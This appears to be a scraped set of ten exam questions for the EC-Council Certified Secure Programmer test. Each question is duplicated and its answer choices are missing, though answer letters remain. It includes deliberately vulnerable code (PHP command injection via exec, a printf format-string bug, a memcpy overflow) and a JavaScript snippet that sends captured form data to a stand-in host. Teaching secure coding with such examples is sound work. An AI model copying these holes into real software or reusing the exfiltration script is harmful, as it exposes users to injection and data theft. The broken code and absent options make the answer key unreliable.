EC-COUNCIL EC-Council Certified Secure Programmer v2 - 312-92 Exam Questions
QUESTION NO: 1
Mathew is working on a Fedora machine and is having issues with some shellcode he wrote that is producing errors. Mathew decides to download and use Ktrace to debug the shellcode to see where the errors are originating from. Why will his plan not work?
Mathew is working on a Fedora machine and is having issues with some shellcode he wrote that is producing errors. Mathew decides to download and use Ktrace to debug the shellcode to see where the errors are originating from. Why will his plan not work?
Correct Answer: A
QUESTION NO: 2
William, a software developer just starting his career, was asked to create a website in PHP that would allow visitors to enter a month and a year for their birth date. The PHP code he creates has to validate the input after it is entered. If William uses the following code, what could a malicious user input to the year value to actually delete the whole website?
$month = $_GET['month'];
$year = $_GET['year'];
exec("cal $month $year", $result);
print "<PRE>";
foreach($result as $r)
{
print "$r<BR>";
}
print "</PRE>";
William, a software developer just starting his career, was asked to create a website in PHP that would allow visitors to enter a month and a year for their birth date. The PHP code he creates has to validate the input after it is entered. If William uses the following code, what could a malicious user input to the year value to actually delete the whole website?
$month = $_GET['month'];
$year = $_GET['year'];
exec("cal $month $year", $result);
print "<PRE>";
foreach($result as $r)
{
print "$r<BR>";
}
print "</PRE>";
Correct Answer: D
QUESTION NO: 3
Victor is creating an online shopping cart for his company that will accept credit cards as payment. What protocol that provides open encryption and security specifications designed to protect credit card transactions should Victor use?
Victor is creating an online shopping cart for his company that will accept credit cards as payment. What protocol that provides open encryption and security specifications designed to protect credit card transactions should Victor use?
Correct Answer: D
QUESTION NO: 4
If a developer wrote the following code, what would the script be vulnerable to?
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar('\n');
printf("number (%p) is equal to %d\n", &value, value);
}
If a developer wrote the following code, what would the script be vulnerable to?
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar('\n');
printf("number (%p) is equal to %d\n", &value, value);
}
Correct Answer: B
QUESTION NO: 5
When making a RPC function call on the local machine, what function should be used?
When making a RPC function call on the local machine, what function should be used?
Correct Answer: B
QUESTION NO: 6
What security package is implemented with the following code?
dwStatus = DsMakSpn
(
"ldap",
"MyServer.Mydomain.com",
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
What security package is implemented with the following code?
dwStatus = DsMakSpn
(
"ldap",
"MyServer.Mydomain.com",
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
Correct Answer: C
QUESTION NO: 7
Kevin is developing a webpage using html and javascript code. The webpage will have a lot of important content and will have a number of functions that Kevin does not want revealed through the source code. Why would Kevin choose to employ HTML Guardian to hide the source code of his webpage?
Kevin is developing a webpage using html and javascript code. The webpage will have a lot of important content and will have a number of functions that Kevin does not want revealed through the source code. Why would Kevin choose to employ HTML Guardian to hide the source code of his webpage?
Correct Answer: D
QUESTION NO: 8
Cylie is the Oracle DBA for her company and now wants to track all actions on her Oracle server using auditing. What file should Cylie insert the following line into?
audit_trail = true
Cylie is the Oracle DBA for her company and now wants to track all actions on her Oracle server using auditing. What file should Cylie insert the following line into?
audit_trail = true
Correct Answer: C
QUESTION NO: 9
Simon is going through some of Heather's code and notices an issue. What issue did Simon find in the following code?
void f4(void * arg, size_t len)
{
char *buff = new char[100];
C *ptr = new C;
memcpy(buff, arg, len);
ptr->vf();
return;
}
Simon is going through some of Heather's code and notices an issue. What issue did Simon find in the following code?
void f4(void * arg, size_t len)
{
char *buff = new char[100];
C *ptr = new C;
memcpy(buff, arg, len);
ptr->vf();
return;
}
Correct Answer: A
QUESTION NO: 10
Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to
http://scarysite.com. Travis decides to get back on his production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring = ""
for(fld in this) {
obstring += fld + ": " this[fld] + ", ";
}
obstring += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://scarysite.com?obj=" +
escape(objString), true);
req.send(null);
}
</script>
Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to
http://scarysite.com. Travis decides to get back on his production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring = ""
for(fld in this) {
obstring += fld + ": " this[fld] + ", ";
}
obstring += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://scarysite.com?obj=" +
escape(objString), true);
req.send(null);
}
</script>
Correct Answer: D
